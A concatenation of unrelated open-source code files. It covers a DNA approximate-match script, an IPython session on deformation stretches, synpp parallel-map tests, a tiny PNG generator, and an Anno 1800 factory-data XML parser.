GTTCGAACTTCCGTGTTTACGATACAGCCACAGGGTGCCGCAAGATCCGGGCTACGTTTAGGGGTGTTTAAGTTATGATGAGGATCAGCAACCCAAAGCGCCGTTCCAAAATGAATGATGCATCTCCTCAAAGGAAGAGTGAACGTCGCGCCGACACTACATTTAGTGAGGTTCCGTGATAGAGCACGTAACATGACAATAAGCGAGAAAAGTCGCTGTCGTAGGCCTGAGCCGTACTGTCCTTCTCTCCTTTGGAGGAAATATTTAGCCTTTTAGAAGAGGACGTCCAGAGGGTGACAGATGGTCTGACTGCGAGTGTGAGTGAACCTGAACAACTTCGTGCGCTAATGTTTGAACCACAAACAGGCAGGTGACCACCATGTTTTGCAAGTATCTCCGGTCAGTAATGTCTTGCTTTCGTGACGCTGGGCATCTCCGTAGCAACCTCCGAATGAGTAGGTCCATTGTCAGCGAGTTCGAATTCGTATAGTCGTCCACTGCAGACTCGGGACGGTAATGAAGCTGACTATCGCCAAGGTTGTAATATGTTTCGGAATAACCGTAGAGCCTTCCGTGCACTCGGTAGCTGGTCTGGCAGGTTGAGGTTGCCGGTCTTACATATAAGTACCCTACCCAGCATGAGCAGCGTCTGCTACCAAGAGGTTTTAAAGTACGGCGGCACCACTCAATTGAGTCATTACCTGCCAGTGATATCTAGGGAGGAGTTCTAGGTATAGATTGCCGGACGCTTAGTGTAAGCCTAGCTATGCGCAGCCACATCTAGAGTTGCAAAGTCTGGTCCTCGTCAAATCAAGGGGCCGCTGTGTATTTCTCCAGGAACTCATGAGCCACCTGAAGCACGCTCGCCCGACTCGCACTATAGGTATCTGGGCGTGGTCTTTGGTCTCAATATACCGCAATGCCTCTCTGCGAACATGACGGGGACAAGTCATTCGCGACCATCATCGGCACCGCTAGGAATCGACAGACGCCGCATTAGAGCCATCCAAAAGGAACTACAATTAGCATCTACTGTTAGTTGTTCTTCACGTGGAAGGCGGTGTGGTGCCGAGGTGCGGATAGCATGGTAACTTTATTTTCCGATGCCCCAGAAGTCTAAAGCACGGCGCACGCTACTGTGAGGGCTTACCCTACAGGTTATTCTTCGACTCCCCAATCGCGATAAGGTCGCACCGCATCTGCTCCCGTGCCTCCATAACCTGGTTCCTCAGGCCAAGGCGTTTGATTGGAGACCTAGTCTGTTTATGTAGTGGTTGATTCTGGAAAAACTGCCTACAAAAGGACTTCTAGGACATAGAGCGTGCATACCGATAGTAAGCGCGGCGGGAAACAAACTCTCATGTGTGCGTAACGCAAAATCCTTGGTTTTTGCTAGCTAAGGGGCCAGGTCCGCAGGCCAAACCCCAGCCCATCGAGGTCAAGCAGTACGCCGGACTCGATACGGAACTTGTGGTTCTCGTATCAGGCTTGCCAATCCTTCAGGTCGTCTACGGCAACTACACCCTTCCCGCAACCGTGGAGTCAACCAAATGAAGACCTCTGAGTTTTTCGGATCAGCTCGTTGGGACTATCGATTAAGCAAGTTGTGAAAGGGACTCCCTCTCGGTCCAGCATGATCTCCCTCATTCATTATTTGTAAACAATGCTCTTCGGACGGAAGCCTCGCGTACCTTTGGCCATTTAGCTTGTTGCGGAATCCAAAGGCGCCGGCAGTCAGACCCTGTGTCCACGTAAGGTGGCGCGACAATGTCGTCAACTCTTGCTAGTTCTTCTTCATTGGTTGCGGATTTTAATTAACTGCACTATGCCTATTCGCGTCTCACCGATGCACATTGCGTGTCCCGTTCTTCGAGCCAGACGAATATTGTAATCCAAACAGTCGCCGGTAGCGCATCATCTACTTGGGGTCAAGGAATAGGTTAGGGTGAGGTGTACACTCTGTTTCGTGGAAGATGCCCGTGAAGGGGTTCATGGGGTAG
TGGGCGGGACGACACAGGTCGTCACCAAAAGTTAAGAATCCCTCAAATCCTAATTGAGCGTTCCCCATGTGTTTTCCTTATGGTCGCCGAGCTCATTGTCTTGTGCCCGATATAAGCGCGGCCAGACGTACAAATGTCCTAGTGCTTGATGCGCCAGCCGAGTGGTCGATATTACTCTACCAAATAATCATTTGCCGTCAGAATATTCCTAACTTTCATCACACGTTTTAACGCACCACCGACGTGCTGGAAGTGGACGCTTTAGGCGGGGGCCTTTCTCGGTTTGTAATGTAACAGTAATGGGCTAAAGCGGTGAACGCATTTCAGGGCACTGAGAAACTGCATGGTAATACCGCAGAGCGGTAGAGGGCAGGTTAACGAGTGCGGACAAGCCGGCAACTATCCTCAAACGAGTAGGAGTGTTTTGAAGCAATCTCCTTCTAGGCTGACCCCATTGAGTTTGTTCGACTGCCACAGATGCCGTGTCGAGTTGAAGTCAACGGCCGTCTCTTGCGATCGGTGCGACGATTAGCAGCTTAGAGCACTTCCGTCCAGCAGTAAAGCGGGAAGGCCTTTTTAGACAGTAATTTGCGCTGAGTACTATAATAACTAACCTTAACGCCTTCAATTAAACGAGAGCAATCTGTCTGAAATCACTACTCTGTCATCATAGTGTGGCGAGGACGTCGGTTGACCCGCCTTGGAGTGAGCTGGTAATGCTTACATTGTCTAATTGACATATGATGGAGGAAAGTGACTTATTGTTCGACTGATGCAGGCTCTCAAATTGGCCACTCCACTTTGCCGACGGCGGTCTAGCCTAGATCTTACATTGTCTGGTTTCAAACCGAGCTCATTGGTTGAGACGCCTTATCATGAGTCGTCCTTAGCAGTCAGCTACGATCTCGCGAACGCCCCAAGGGAGTTAAGCATCTTGGAGGTAGCACATGTTCGTAGTTGAAACCGACTCCTACAGTGTGTCAGAAAGGGAAGCCCTAAAGTCGGACGATACCCTTTGGGTTACAATATAATAGCATTCCCTAATACATGTTACCAATCCTGCCCGGCCGGCGGTGGGGCGTCGGCTTGATGATTGTCATCCACTCGATCTATACACATCGCCTGTGGCTACACCAGTACGCCACTACTGGTACGATGCCTATGTCGCGCACAAGGTGGCAGTTATTACCCCCAAGATAAGGGTCGGCATGACTTGGCGTGTTGTATTGGTGTTGTGTGCCTCCTCTCAGACGGTTTATGTTAGGCACAGAGAGTTGGGGTAGGCGAATACATTGTTCTCTCCTGAATCGCACTGCCAGACTGAGCGGCAGATAGCAACCTATACGCCCCTTGGCCTAACTTCAAGAAGAAGTGCGCATACAGTCGATAGTAGGGGTCTGAGAGATTAGCTCCTTATTGCTCCAAGCCTTCTAAATCGATTACGTATACCTGTAGATAGTGCGGTGTCGTCTGGTAGTTGCTCATCTACAGGGCGTTCAGGTGCTTTGTCCAACCGCTCAGATCCTAACCACTGTGCCCAGTCACTGGGTAACACGCTTTCAGTAGACCAAGGGTTGTGCGAGTTACCTTTATCTCTAGACCGTCAGCCACGACCATGTGAAAGATGAATGTATGTGCTTGCTTGACCCTCTCATGGTAGACGGCGACTTACGATTGTCTACACCACCTGCCTTAAGCTGGGTTAGGAGCCTCAAGTGACAATTGGGTGCCGTTACGTAATGACCACCCAGAAACATGGACGATGACGGATGCATACATTGGACGCACCCCGATAGGTCATAAGGGTTAGCCTGATTCCAGAATAACATACCAACCTGCAAATGGTAGCAGTATCGAATAACGCTTCTGATAACAGGTATTTTACAAATGCGCCAGAGTAGCTCACCACGTTCTACACGCGACTTACCCTCCTTTGTAAGGACATGGACTGAGTTAGGACCACTTGATCGGGTAAAGGATGAAGTCAGGCTTATGCCAAC
GTTCTAAGTCCTGTGGTTGGGTAGTTCCTTACGACGTCAGTTCGGGTGGAGCCGCTAGTCGTTGGCCTTACTGGAGACAGCGTTCATTGCCTTTCATCTCTCCGGGATATTGACTGCACCAGTCGTACTCCGCTCCAGAACAACAGGAGAGAGCTACAAGTCGACTCCGACCAGCACCTCACCCTTTATGATCTGCTGGTAAACTCCCGCAGAGCGGTGTCCCGTAACGTAATGAATTGCGCTGAAAATGGAAGAATCCCGTCAGGTCAAGCTAGGGAGATCAAAACAACCCTGCAGCTTAGTCGAACGGTTGTATTCCAGATAGGTAAACATAGAGGATACAAAGCATTCGAAACAGGAAGCGTTCCAATTTGGTTGGGTCTAATTCTGACCCCTATTCCGTGGGCTTCCTTTGAGAACCAATGCGGCAGACTTCGGTTAAAATAGACAACCCCTAAGCGGATGGTTAGGGTGCGTGGTGTTCGGTAGGCCCGACGAGGACACGTGAACGGCATAAACGTGACCGTCCTAGGAGACGATATGCGCAAAGGCCAGTACCCGTGAGGTATTGTGGGAATAACAGACGCTAGCAGTGGAATGTCAATAAAGCTTCGACCGGCGTGTAGAGTACTAGCGACGTTTAGCCGCGGCTCGGTATACATAGTAGGTCTGGAAATGTGGTTTGCAGAACTTCGTCGTCACCTCTGTCGTTGAAGAATAAACACTGAGTAATCGACATTGTGAATTGGGCGGAGCAGTGTGAATATAGACATTGAACTGAGTTGATGCGTTATCCCAGTTTCGGTTAGCGGTCGCTTTACAGAAGGGACACGTGGAGCAGCGCACTCACAGATCTCGCCGTAAGCGCGCAGCCGGAGCGAGCTATCAGTAGGGGAAACTCATGGATAACTAAGTCGGACCCGGCCCGGTCCCCGCTAATAATGACTAGACTATCAGTGGTGCCTAATAGAGCACTTCAAATAGTACGTAGCTTATAGGCAGTCCGTGCTTCCTCAAGACTACTGAGAAAGCTTTTCCTACCTCGAGGCTACAAGTGGTGAGAGTCGTGGCCCATTGGAGTAGTGCCTGACCGCCTAACTGTGTTGGGCTCCACGAATCCAGGCGTCCTTACGAGCGCGCATCAGAATCGCAATAATACGCTGGTCCACCGCGGGACATGAACCGCATTATGCCGCAATGGGTCTTCAAAGGTGGCTAGGAGAAGCAGAATAAGAATATTCGGTAGCAAACGGGTCCCTGTGCGGGATGTGTCTGGACCGCTGTC"
mismatch = 6

# Returns the number of positions at which the pattern and the cut-out
# substring differ (the Hamming distance)
def hamming_distance(string_kivagott):
    counter = 0
    for i in range(len(pattern)):
        if pattern[i] != string_kivagott[i]:
            counter += 1
    return counter

for i in range(len(string) - len(pattern) + 1):
    string_kivagott = string[i:i + len(pattern)]
    if hamming_distance(string_kivagott) <= mismatch:
        print(i, end=' ')

stop = timeit.default_timer()
print(stop - start)
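The scan above can be written as a self-contained Python 3 sketch; the function names and the short test strings below are illustrative, not from the original file:

```python
def hamming_distance(a, b):
    # number of mismatching positions between two equal-length strings
    return sum(1 for x, y in zip(a, b) if x != y)

def approximate_matches(text, pattern, mismatch):
    # every offset whose window is within the allowed mismatch budget
    m = len(pattern)
    return [i for i in range(len(text) - m + 1)
            if hamming_distance(text[i:i + m], pattern) <= mismatch]

print(approximate_matches("ACGTACGT", "ACGA", 1))  # [0, 4]
```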
# snippets/deformation_statistics.py (pinkieli/nla3d, MIT)
cd /Users/dmitry/gdisk/PHD/nla3d/
ls
cd custom/
ls
less model_lambda_20.txt
%less model_lambda_20.txt
np.genfromtxt?
np.genfromtxt("model_lambda_20.txt",skip_header = True)
M = np.genfromtxt("model_lambda_20.txt",skip_header = True)
shape(M)
his_values = []
his_weight = []
for i in range(shape(M)[0]):
    lambda1 = M[i,2]
    lambda2 = M[i,3]
    lambda3 = M[i,4]
    J = lambda1*lambda2*lambda3
    lambda1 = J**(-1.0/3.0)*lambda1
    lambda2 = J**(-1.0/3.0)*lambda2
    lambda3 = J**(-1.0/3.0)*lambda3
a = linspace(1.0,2.0,100)
y1 = a**(1.0/2.0)-1.0/lambda2
y2 = lambda1/lambda2 - a**(-3.0/2.0)
plot(a,y1)
plot(a,y2)
input("wait..")
i = 1000
lambda1 = M[i,2]
lambda2 = M[i,3]
lambda3 = M[i,4]
J = lambda1*lambda2*lambda3
lambda1 = J**(-1.0/3.0)*lambda1
lambda2 = J**(-1.0/3.0)*lambda2
lambda3 = J**(-1.0/3.0)*lambda3
print(lambda1)
print(lambda2)
print(lambda3)
a = linspace(1.0,2.0,100)
#y1 = a**(1.0/2.0)-1.0/lambda2
#y2 = lambda1/lambda2 - a**(-3.0/2.0)
y1 = a**(1.0/2.0)*lambda2-1
y2 = a**(-3.0/2.0)*lambda1/lambda2-1
plot(a,y1,"r-")
a1 = max([lambda2**(-2), 1.0])
a2 = max([(lambda2/lambda1)**(-2.0/3.0), 1.0])
delta_a = abs(a1-a2)
print "delta_a = " + str(delta_a)
plot([a1],[0.0],'ro')
plot([a2], [0.0], 'ro')
plot(a,y2,"r--")
grid()
title("a,b,c range")
xlabel("a,b,c")
ylabel(">0")
y1 = a**2*lambda2**(-2)-1
y2 = a**(-3)*lambda1*lambda2**2-1
plot(a,y1,"g-")
plot(a,y2,"g--")
b1 = max([lambda2, 1.0])
b2 = max([(lambda1*lambda2**2)**(1.0/3.0),1.0])
delta_b = abs(b1-b2)
print("delta_b = " + str(delta_b))
plot([b1],[0.0],'go')
plot([b2],[0.0],'go')
y1 = (a*lambda2/lambda1)**(-2.0/6.0)*lambda2-1
c1 = 1.0
c2 = lambda2**2*lambda1
delta_c = abs(c1-c2)
print "delta_c = " + str(delta_c)
plot(a,y1,"b-")
plot([c1],[0.0],'bo')
plot([c2],[0.0],'bo')
al = []
bl = []
cl = []
wl = []
for i in range(shape(M)[0]):
    lambda1 = M[i,2]
    lambda2 = M[i,3]
    lambda3 = M[i,4]
    J = lambda1*lambda2*lambda3
    lambda1 = J**(-1.0/3.0)*lambda1
    lambda2 = J**(-1.0/3.0)*lambda2
    lambda3 = J**(-1.0/3.0)*lambda3
    I1 = lambda1**2+lambda2**2+lambda3**2
    wl.append(I1*M[i,1])
    #print(lambda1)
    #print(lambda2)
    #print(lambda3)
    a = linspace(1.0,2.0,100)
    #y1 = a**(1.0/2.0)-1.0/lambda2
    #y2 = lambda1/lambda2 - a**(-3.0/2.0)
    y1 = a**(1.0/2.0)*lambda2-1
    y2 = a**(-3.0/2.0)*lambda1/lambda2-1
    #plot(a,y1,"r-")
    a1 = max([lambda2**(-2), 1.0])
    a2 = max([(lambda2/lambda1)**(-2.0/3.0), 1.0])
    delta_a = abs(a1-a2)
    #print("delta_a = " + str(delta_a))
    #plot([a1],[0.0],'ro')
    #plot([a2], [0.0], 'ro')
    #plot(a,y2,"r--")
    #grid()
    #title("a,b,c range")
    #xlabel("a,b,c")
    #ylabel(">0")
    y1 = a**2*lambda2**(-2)-1
    y2 = a**(-3)*lambda1*lambda2**2-1
    #plot(a,y1,"g-")
    #plot(a,y2,"g--")
    b1 = max([lambda2, 1.0])
    b2 = max([(lambda1*lambda2**2)**(1.0/3.0),1.0])
    delta_b = abs(b1-b2)
    #print("delta_b = " + str(delta_b))
    #plot([b1],[0.0],'go')
    #plot([b2],[0.0],'go')
    y1 = (a*lambda2/lambda1)**(-2.0/6.0)*lambda2-1
    c1 = 1.0
    c2 = lambda2**2*lambda1
    delta_c = abs(c1-c2)
    #print("delta_c = " + str(delta_c))
    #plot(a,y1,"b-")
    #plot([c1],[0.0],'bo')
    #plot([c2],[0.0],'bo')
    al.append(delta_a)
    bl.append(delta_b)
    cl.append(delta_c)
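The J**(-1.0/3.0) scaling in the loop above is the usual volumetric/isochoric split of the principal stretches. As a quick standalone check with made-up stretch values, the rescaled stretches should multiply to one (the isochoric deformation has unit determinant):

```python
# Illustrative principal stretches, not taken from model_lambda_20.txt
lambda1, lambda2, lambda3 = 1.2, 0.9, 1.05
J = lambda1 * lambda2 * lambda3          # volume ratio
iso = [J ** (-1.0 / 3.0) * l for l in (lambda1, lambda2, lambda3)]
product = iso[0] * iso[1] * iso[2]       # should be 1 up to rounding
print(round(product, 12))  # 1.0
```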
# tests/test_parallel.py (Nitnelav/synpp, MIT)
from synpp.parallel import ParallelMasterContext, ParalelMockMasterContext
import synpp
def sum_up(context, argument):
    return context.data("xyz") + context.config("uvw") + context.config("hij") + argument

def test_parallel():
    data = { "xyz": 1200 }
    config = { "uvw": 40, "hij": 5 }
    arguments = [1000000, 2000000, 3000000]

    with ParallelMasterContext(data, config, 3, None) as parallel:
        result = parallel.map(sum_up, arguments)
    assert result == [1001245, 2001245, 3001245]

    with ParallelMasterContext(data, config, 3, None) as parallel:
        result = parallel.map_async(sum_up, arguments).get()
    assert result == [1001245, 2001245, 3001245]

    with ParallelMasterContext(data, config, 3, None) as parallel:
        result = list(parallel.imap(sum_up, arguments))
    assert result == [1001245, 2001245, 3001245]

    with ParallelMasterContext(data, config, 3, None) as parallel:
        result = list(parallel.imap_unordered(sum_up, arguments))
    assert 1001245 in result
    assert 2001245 in result
    assert 3001245 in result

def test_mock():
    data = { "xyz": 1200 }
    config = { "uvw": 40, "hij": 5 }
    arguments = [1000000, 2000000, 3000000]

    with ParalelMockMasterContext(data, config, 3) as parallel:
        result = parallel.map(sum_up, arguments)
    assert result == [1001245, 2001245, 3001245]

    #with ParalelMockMasterContext(data, config, 3) as parallel:
    #    result = parallel.map_async(sum_up, arguments).get()
    #assert result == [1001245, 2001245, 3001245]

    with ParalelMockMasterContext(data, config, 3) as parallel:
        result = list(parallel.imap(sum_up, arguments))
    assert result == [1001245, 2001245, 3001245]

    with ParalelMockMasterContext(data, config, 3) as parallel:
        result = list(parallel.imap_unordered(sum_up, arguments))
    assert 1001245 in result
    assert 2001245 in result
    assert 3001245 in result

def test_parallel_stage():
    result = synpp.run([
        { "descriptor": "tests.fixtures.parallel_stage" }
    ])[0]
    assert result == [1321, 2321, 3321, 4321, 5321]
# data/textData/pngTest.py (JohnHenryEden/wind3D-custom, MIT)
import png
png.from_array([
    [255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
    [255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
    [255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
    [255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
    [255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
    [255, 0, 0, 255, 0, 255, 255, 255, 255, 0, 0, 255, 255, 0, 0, 255],
], 'RGBA').save("small_smiley.png")
# coding:utf-8
# data_parser/template/factories.py (wzy9607/Anno1800CalculatorDataParser, MIT)
import abc
import bs4
from .building import Building
class Factory(Building):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building> *
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<TerrainType>Enum("Coast"/"Water")</TerrainType>
<SkipUnlockMessage>Binary(Default 0)</SkipUnlockMessage>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking> * TODO
<DeletePropsRadius>1</DeletePropsRadius>
</Blocking>
<Cost .../> *
<Object> TODO
<Variations>
<Item>
<Filename>data/graphics/buildings/production/agriculture_01/agriculture_01.cfg
</Filename>
</Item>
</Variations>
</Object>
<Mesh /> TODO
<Selection> TODO
<ParticipantMessageArcheType>Resident_tier01_atWork</ParticipantMessageArcheType>
<Colors>
<WeakSelectionColorType>NoColor</WeakSelectionColorType>
</Colors>
</Selection>
<Constructable /> TODO
<Locked /> TODO
<SoundEmitter> TODO
<ActiveSounds>
<Item>
<Sound>214800</Sound>
</Item>
<Item>
<Sound>206376</Sound>
</Item>
</ActiveSounds>
<ConstructionSounds>
<BuildMoveSuccess>
<Item>
<VectorElement>
<InheritedIndex>0</InheritedIndex>
<InheritanceMapV2>
<Entry>
<TemplateName>FarmBuilding</TemplateName>
<Index>0</Index>
</Entry>
</InheritanceMapV2>
</VectorElement>
<Sound>214783</Sound>
</Item>
</BuildMoveSuccess>
</ConstructionSounds>
<MaterialType>Wood</MaterialType>
</SoundEmitter>
<FeedbackController /> TODO
<Infolayer /> TODO
<UpgradeList /> TODO
<RandomDummySpawner /> TODO
<Factory7 .../> *
<FactoryBase .../>
<LogisticNode /> TODO
<Slot .../> TODO
<ModuleOwner> TODO
<ModuleLimit>144</ModuleLimit>
<ConstructionOptions>
<Item>
<ModuleGUID>1010270</ModuleGUID>
</Item>
</ConstructionOptions>
<ModuleBuildRadius>0</ModuleBuildRadius>
<HardFarmsConfig>1</HardFarmsConfig>
</ModuleOwner>
<AmbientMoodProvider> TODO
<AmbientMood>AgricultureBuildingsEurope</AmbientMood>
<Murmur>Farm</Murmur>
<DynamicEnvironmentType>None</DynamicEnvironmentType>
</AmbientMoodProvider>
<Maintenance .../> *
<Attackable> TODO
<MaximumHitPoints>1500</MaximumHitPoints>
<SelfHealPerHealTick>4</SelfHealPerHealTick>
</Attackable>
<FreeAreaProductivity> TODO
<InfluenceRadius>11</InfluenceRadius>
<WorkerUnit>102433</WorkerUnit>
<MaxWorkerAmount>3</MaxWorkerAmount>
<WorkerPause>10000</WorkerPause>
</FreeAreaProductivity>
<IncidentInfectable> TODO
<Infectable>
<Illness>
<Escalated>0</Escalated>
</Illness>
<Explosion>
<Base>0</Base>
<Escalated>0</Escalated>
</Explosion>
</Infectable>
<Explosion>
<ExplosionCoreDamage>1000</ExplosionCoreDamage>
<DamageExplosionChance>0</DamageExplosionChance>
</Explosion>
<IncidentInfectionChanceFactors>
<Fire>
<DensityFactor>0.025</DensityFactor>
<DensityDistance>20</DensityDistance>
<FactoryProductivityFactor>0.1</FactoryProductivityFactor>
<FactoryUndertimeFactor>0.05</FactoryUndertimeFactor>
</Fire>
<Riot>
<FactoryOvertimeFactor>0.4</FactoryOvertimeFactor>
<FactoryUndertimeFactor>0.2</FactoryUndertimeFactor>
<FactoryHappinessFactor>0.2</FactoryHappinessFactor>
<HappinessThreshold>20</HappinessThreshold>
</Riot>
</IncidentInfectionChanceFactors>
</IncidentInfectable>
<Pausable /> TODO
<Culture> TODO
<CultureType>Landscaping</CultureType>
<HasPollution>1</HasPollution>
</Culture>
<IncidentInfluencer> TODO
<Influence>
<Illness>
<Distance>10</Distance>
</Illness>
</Influence>
</IncidentInfluencer>
<Electric /> TODO
<ItemGenerator /> TODO
<QuestObject /> TODO
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factory requires certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory used for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
inactive_amount .Item.InactiveAmount amount of product consumed per minute(?) when the factory is
paused
shutdown_threshold .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is
less than this threshold
"""
    @property
    @abc.abstractmethod
    def template_name(self):
        ...
    def parse(self):
        """
        parse the node, the actual parsers are parse_node_{tag_name}
        """
        super().parse()
        self.parse_node_factory(self.values_node.Factory7)
        self.parse_node_factory_base(self.values_node.FactoryBase)
        self.parse_node_maintenance(self.values_node.Maintenance)
    def parse_node_factory(self, node: bs4.Tag):
        """
        <Factory7>
            <NeededFertility>GUID</NeededFertility>  some factory requires certain island fertility
        </Factory7>

        needed_fertility    Factory7.NeededFertility    some factory requires certain island fertility

        :param node: the Factory7 node
        """
        if node.NeededFertility:
            self.values["needed_fertility"] = int(node.NeededFertility.string)
    def parse_node_factory_base(self, node: bs4.Tag):
        """
        <FactoryBase>
            <FactoryInputs>  products that the factory consumes
                <Item>
                    <Product>GUID</Product> *  GUID of product
                    <Amount>NaturalInteger</Amount> *  amount consumed per cycle
                    <StorageAmount>NaturalInteger</StorageAmount> *  amount of product that the factory can store
                </Item>
                ...
            </FactoryInputs>
            <FactoryOutputs> *  products that the factory produces
                <Item>
                    <Product>GUID</Product> *  GUID of product
                    <Amount>NaturalInteger</Amount> *  amount of product produced per cycle
                    <StorageAmount>NaturalInteger</StorageAmount> *  amount of product that the factory can store
                </Item>
                ...
            </FactoryOutputs>
            <CycleTime>NaturalInteger(Default 30)</CycleTime>  the time of a production cycle (second)
        </FactoryBase>

        inputs              FactoryBase.FactoryInputs   a list of products that the factory consumes
            id                  .Item.Product           GUID of product
            amount              .Item.Amount            amount of product consumed per cycle
            amount_per_minute                           amount of product consumed per minute
            storage_amount      .Item.StorageAmount     amount of product that the factory can store
        outputs             FactoryBase.FactoryOutputs  a list of products that the factory produces
            id                  .Item.Product           GUID of product
            amount              .Item.Amount            amount of product produced per cycle
            amount_per_minute                           amount of product produced per minute
            storage_amount      .Item.StorageAmount     amount of product that the factory can store
        production_time     FactoryBase.CycleTime       the time of a production cycle (minute)

        :param node: the FactoryBase node
        """
        if node.CycleTime:
            production_time = int(node.CycleTime.string) / 60.0
        else:
            production_time = 0.5

        self.values['inputs'] = list()
        if node.FactoryInputs:
            for item in node.FactoryInputs("Item"):
                input1 = dict()
                input1['id'] = int(item.Product.string)
                input1['amount'] = int(item.Amount.string)
                input1['amount_per_minute'] = float(input1['amount']) / production_time
                input1['storage_amount'] = float(item.StorageAmount.string)
                self.values['inputs'].append(input1)
        self.values['outputs'] = list()
        for item in node.FactoryOutputs("Item"):
            output = dict()
            output['id'] = int(item.Product.string)
            output['amount'] = int(item.Amount.string)
            output['amount_per_minute'] = float(output['amount']) / production_time
            output['storage_amount'] = float(item.StorageAmount.string)
            self.values['outputs'].append(output)
        self.values['production_time'] = production_time
    def parse_node_maintenance(self, node: bs4.Tag):
        """
        <Maintenance>
            <ConsumerPriority>1</ConsumerPriority>  ?
            <Maintenances> *  products (money, workforce, etc.) used for factory maintenance
                <Item>
                    <Product>GUID</Product> *  GUID of the product
                    <Amount>NaturalInteger</Amount> *  amount of product consumed per minute(?)
                    <InactiveAmount>NaturalInteger(Default 0)</InactiveAmount>  amount of product consumed per
                        minute(?) when the factory is paused
                    <ShutdownThreshold>Float(Default 0)</ShutdownThreshold>  the factory will be shutdown if
                        workforce fulfill rate is less than this threshold
                </Item>
                ...
            </Maintenances>
        </Maintenance>

        maintenances    Maintenance.Maintenances    a list of products that the factory used for maintenance
            id                  .Item.Product           GUID of the product
            amount              .Item.Amount            amount of product consumed per minute(?)
            inactive_amount     .Item.InactiveAmount    amount of product consumed per minute(?) when the factory is paused
            shutdown_threshold  .Item.ShutdownThreshold the factory will be shutdown if workforce fulfill rate is less than this threshold

        :param node: the Maintenance node
        """
        self.values['maintenances'] = list()
        for item in node.Maintenances("Item"):
            maintenance = dict()
            maintenance['id'] = int(item.Product.string)
            maintenance['amount'] = int(item.Amount.string)
            if item.InactiveAmount:
                maintenance['inactive_amount'] = int(item.InactiveAmount.string)
            else:
                maintenance['inactive_amount'] = 0
            if item.ShutdownThreshold:
                maintenance['shutdown_threshold'] = float(item.ShutdownThreshold.string)
            else:
                maintenance['shutdown_threshold'] = 0.0
            self.values['maintenances'].append(maintenance)
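The FactoryBase docstrings above boil down to one conversion: a per-cycle amount plus a CycleTime in seconds becomes an amount per minute. A dependency-free sketch of that arithmetic, using xml.etree.ElementTree in place of the project's BeautifulSoup, with an invented GUID and amounts:

```python
import xml.etree.ElementTree as ET

# Minimal, made-up <FactoryBase> fragment for illustration only
fragment = """
<FactoryBase>
    <FactoryOutputs>
        <Item>
            <Product>1010196</Product>
            <Amount>1</Amount>
            <StorageAmount>4</StorageAmount>
        </Item>
    </FactoryOutputs>
    <CycleTime>60</CycleTime>
</FactoryBase>
"""

node = ET.fromstring(fragment)
# CycleTime is given in seconds; the parser works in minutes (default 0.5 min)
cycle = node.findtext("CycleTime")
production_time = int(cycle) / 60.0 if cycle else 0.5
outputs = []
for item in node.find("FactoryOutputs"):
    amount = int(item.findtext("Amount"))
    outputs.append({
        "id": int(item.findtext("Product")),
        "amount": amount,
        "amount_per_minute": amount / production_time,
    })
print(production_time, outputs)
```

The real parser reaches the same numbers through bs4 attribute access (node.CycleTime.string, item.Product.string).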
class FarmBuilding(Factory):
"""
<Standard>
<GUID>GUID</GUID> *
<Name>Text</Name> *
<IconFilename>Path</IconFilename> *
<InfoDescription>11143</InfoDescription>
</Standard>
<Text .../> *
<Building />
<BuildingType>"Factory"</BuildingType>
<BuildingCategoryName>100000</BuildingCategoryName>
<BuildModeRandomRotation>Enum(90/180)</BuildModeRandomRotation> *
<AssociatedRegion>List("Moderate";"Colony01")</AssociatedRegion> *
</Building>
<Blocking /> *
<Cost .../> *
<Object ...> *
<Mesh /> *
<Selection .../> *
<Constructable /> *
<Locked /> *
<SoundEmitter .../> *
<FeedbackController /> *
<Infolayer /> *
<UpgradeList /> *
<RandomDummySpawner /> *
<Factory7 .../> *
<FactoryBase .../> *
<LogisticNode /> *
<ModuleOwner .../> *
<AmbientMoodProvider .../> *
<Maintenance .../> *
<Attackable .../> *
<IncidentInfectable .../> *
<Pausable /> *
<Culture .../> *
<ItemGenerator /> *
<QuestObject /> *
id Standard.GUID GUID of the building
name Standard.Name name of the building
text Text.LocaText.English.Text in-game English name of the building
session Building.AssociatedRegion a list of sessions where the building can be built
costs Cost.Costs a list of resources required for building construction
id .Item.Ingredient GUID of the resource
amount .Item.Amount amount of resource needed
needed_fertility Factory7.NeededFertility some factories require a certain island fertility
inputs FactoryBase.FactoryInputs a list of products that the factory consumes
id .Item.Product GUID of product
amount .Item.Amount amount of product consumed per cycle
amount_per_minute amount of product consumed per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
outputs FactoryBase.FactoryOutputs a list of products that the factory produces
id .Item.Product GUID of product
amount .Item.Amount amount of product produced per cycle
amount_per_minute amount of product produced per minute
storage_amount .Item.StorageAmount amount of product that the factory can store
production_time FactoryBase.CycleTime the time of a production cycle (minute)
maintenances Maintenance.Maintenances a list of products that the factory uses for maintenance
id .Item.Product GUID of the product
amount .Item.Amount amount of product consumed per minute(?)
